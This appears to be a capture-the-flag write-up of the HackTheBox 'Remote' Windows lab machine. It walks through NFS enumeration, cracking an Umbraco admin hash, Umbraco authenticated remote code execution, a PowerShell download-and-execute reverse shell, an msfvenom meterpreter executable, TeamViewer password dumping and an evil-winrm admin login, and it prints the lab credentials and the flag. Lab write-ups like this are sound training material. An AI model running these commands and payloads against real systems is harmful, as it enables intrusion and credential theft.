Hey ! Today's writeup is on Remote, an Easy Windows Box released on March 21st 2020 on HackTheBox.
If you have VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/234
It was my first Windows box. I had wanted to do one for quite some time, but starting from scratch isn't easy. Windows and Linux boxes aren't the same at all: when I started Linux boxes I already had experience with the Linux terminal, but I had none with Windows PowerShell. I therefore struggled to get this box done, but now it is done, and I am very happy to present my writeup of it.
Like always, I performed a Nmap scan
nmap -A -p- -T4 10.10.10.180
I am using the same flags as always :
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)
Here are the scan results :
Nmap scan report for 10.10.10.180
Host is up (0.089s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4       111/tcp   rpcbind
|   100000  2,3,4       111/tcp6  rpcbind
|   100000  2,3,4       111/udp   rpcbind
|   100000  2,3,4       111/udp6  rpcbind
|   100003  2,3        2049/udp   nfs
|   100003  2,3        2049/udp6  nfs
|   100003  2,3,4      2049/tcp   nfs
|   100003  2,3,4      2049/tcp6  nfs
|   100005  1,2,3      2049/tcp   mountd
|   100005  1,2,3      2049/tcp6  mountd
|   100005  1,2,3      2049/udp   mountd
|   100005  1,2,3      2049/udp6  mountd
|   100021  1,2,3,4    2049/tcp   nlockmgr
|   100021  1,2,3,4    2049/tcp6  nlockmgr
|   100021  1,2,3,4    2049/udp   nlockmgr
|   100021  1,2,3,4    2049/udp6  nlockmgr
|   100024  1          2049/tcp   status
|   100024  1          2049/tcp6  status
|   100024  1          2049/udp   status
|_  100024  1          2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/29%OT=21%CT=1%CU=43315%PV=Y%DS=2%DC=T%G=Y%TM=5EFA427
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS
OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m20s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-29T19:38:43
|_  start_date: N/A

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   88.03 ms 10.10.14.1
2   87.58 ms 10.10.10.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 568.54 seconds
After taking a close look at the result file, I noticed the NFS service. NFS is a protocol that allows hosts to access files on a remote server. Keep in mind that Nmap is a very powerful tool, with many scripts to check all sorts of things. For example, by running
nmap --script=nfs-showmount 10.10.10.180
you check for NFS mount points. Here we get site_backups. It's a promising lead. All I had to do was mount it:
$ mkdir mnt
$ sudo mount 10.10.10.180:/site_backups mnt
After some enumeration by hand on the mounted folder, I found an .sdf file: App_Data/Umbraco.sdf. SDF files are compact databases saved in SQL CE format (SQL Server Compact). It's a perfect place to find credentials.
Just before we take a look at it: the exploration of the website didn't seem to lead anywhere at first (I skipped directory busting, my mistake), but with this file it is very likely that the website is based on the open-source CMS Umbraco, so I tried to navigate to 10.10.10.180/Umbraco/. And Bingo!
I tried some basic SQL injections without success; we will come back later with credentials.
Now back to our Umbraco.sdf. The first thing I tried worked (a bit of luck for once 🙂):
strings Umbraco.sdf | grep admin
We get a username, and a password hash.
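That one-liner is the whole credential leak: a database in a world-readable backup share gives up an account name and hash to anyone who can read the file. The following Python is an added example (not from the original post) that does the same scan but over both ASCII and UTF-16LE text, because SQL Server Compact stores nvarchar text as UTF-16 and plain `strings` only reports such runs when given `-e l`. The input blob is constructed here and holds placeholder values, not data from the box.

```python
import re
import sys

# Constructed sample blob standing in for a slice of an .sdf file: one ASCII
# record, one UTF-16LE record, and binary noise. Values are placeholders.
SAMPLE_BLOB = (
    b"\x00\x01\x02\xff"
    + b"admin@example.invalid\x00\x00"
    + b"\x7f\x80"
    + "admin:HASH_PLACEHOLDER".encode("utf-16-le")
    + b"\xde\xad\xbe\xef"
    + b"notcredential\x00"
)

# Same notion of "printable run of at least 4 chars" as GNU strings (-n 4).
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
# UTF-16LE run: printable ASCII byte followed by a NUL byte, 4 or more times.
# GNU strings only finds these with `-e l`.
UTF16LE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def extract_strings(blob: bytes) -> list:
    """Printable strings in blob: ASCII pass first, then UTF-16LE pass."""
    ascii_hits = [m.group().decode("ascii") for m in ASCII_RE.finditer(blob)]
    utf16_hits = [m.group().decode("utf-16-le") for m in UTF16LE_RE.finditer(blob)]
    return ascii_hits + utf16_hits


def grep_strings(blob: bytes, needle: str) -> list:
    """Case-insensitive equivalent of `strings file | grep -i needle`,
    covering both encodings."""
    needle = needle.lower()
    return [s for s in extract_strings(blob) if needle in s.lower()]


if __name__ == "__main__":
    # Usage: python sdf_strings.py <file> <needle>; with no args, scan the sample.
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
        needle = sys.argv[2]
    else:
        data, needle = SAMPLE_BLOB, "admin"
    for hit in grep_strings(data, needle):
        print(hit)
```

Run against a real backup, a hit in the UTF-16 pass that the ASCII pass missed is exactly what a defender auditing an exposed share should be looking for.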
Let's get the password corresponding to the hash with crackstation (https://crackstation.net/)
We can now use the credentials [email protected] and baconandcheese to log in to the Umbraco CMS page.
There is a way to upload files, which could prove useful later, but not to own user. For that part, I found a Python script that gets access through an Umbraco vulnerability when provided with a username and password. Here is the link to it: https://github.com/noraj/Umbraco-RCE
You can pass a PowerShell command as an argument. To try it out, just pass "ls" or "dir".
$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "dir C:/users"

    Directory: C:\users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/19/2020   3:12 PM                .NET v2.0
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic
d-----        2/19/2020   3:12 PM                .NET v4.5
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic
d-----         7/8/2020   2:57 AM                Administrator
d-----        2/19/2020   3:12 PM                Classic .NET AppPool
d-r---         7/8/2020   8:55 AM                Public
We could adjust the command to print out the user flag, which is located in C:/users/Public/user.txt, or do something more fun: I hereby summon the reverse shell.
I used the mini-reverse.ps1 script. You can easily find it online; make sure to change the IP address to the one given by openvpn, and the port to the one you are listening on. Then put it in a server folder and start a little server:
$ mkdir server
$ cp mini-reverse.ps1 server/
$ cd server
$ sudo python -m http.server --bind
If you go to your web browser and type in
Once the Python server is up and running, start listening on the port you chose (8888 for me):
nc -lvnp 8888
I explain a little VERY useful tip about Netcat based reverse shells in my "HackTheBox Beginner Guide", make sure to check it out if you're totally new to this, or even if not, to give me some advice 😉
Now that the server runs and Netcat is listening, just launch the reverse shell.
python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://
After a few seconds, a Windows shell should pop up in the terminal you were listening with. If not, check that your VPN is still running, that the request made to the server for mini-reverse.ps1 returned 200, and that the IPs and ports are the right ones. If everything looks right, just kill everything and start over.
We just need to print the flag, and we're done for this part!
$ cd C:\users\Public
$ type user.txt
I found two ways to get root: one that depends on the access you have managed to establish but is faster, and another that always works but takes a bit longer to perform.
I'll show the second one in this writeup.
Just know that the other method uses the PowerUp.ps1 script to perform a service abuse that adds an Administrator account, which you then log in with using evil-winrm.
When looking at the processes running on the machine (using ps), I noticed TeamViewer was running. As it is a graphical app, and Remote is an Easy box, it wouldn't be running if it wasn't useful at some point.
I found a way to gather credentials from TeamViewer through Metasploit. The only requirement is a meterpreter session. To get one, I tried to obtain a reverse shell using the Metasploit handler.
$ msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
I first started the Metasploit Framework, set the exploit to multi/handler and the payload to a TCP meterpreter reverse shell for 64-bit Windows.
You then need to specify your IP and port, start listening, and you are good to go on this side.
msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > set LHOST
LHOST =>
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.94:8888
The second part is to get the remote host to execute your reverse shell. I first tried the same method as before with the Python script, but then you get a message that a meterpreter session was opened without ever getting the prompt back. That is because multi/handler actually needs a sort of Trojan executed on the machine.
Luckily for us, that isn't hard with msfvenom (a complementary tool to Metasploit).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
LPORT=8888 -f exe > privesc.exe
This will generate a Windows executable file that we need to upload to the target machine. Told you that Umbraco file upload page was going to come in handy 😉
Go to Media and import the privesc.exe file. Then find where your file is. It is in one of the subdirectories in
$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "C:/inetpub/wwwroot/Media/1035/privesc.exe"
Great! We now have our meterpreter session!
[*] Started reverse TCP handler on 10.10.15.48:8888
[*] Sending stage (201283 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.15.48:8888 -> 10.10.10.180:49759) at 2020-07-08 16:11:42 +0200

meterpreter >
To run the tool I spoke about, just type the following command in meterpreter:
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/leo/.msf4/loot/20200708162410_default_10.10.10.180_host.teamviewer__598662.txt
We got ourselves a password 🙂
Let's see if it is the admin password we are looking for. To connect to a Windows machine with credentials, evil-winrm is a great tool. You can find it here: https://github.com/Hackplayers/evil-winrm
Here is how it's used:
$ evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:/users/Administrator/Desktop/root.txt
69ee6ac83f153675310f9894b92e1ca2
That's it for this writeup ! I hope you enjoyed, and see you for another one !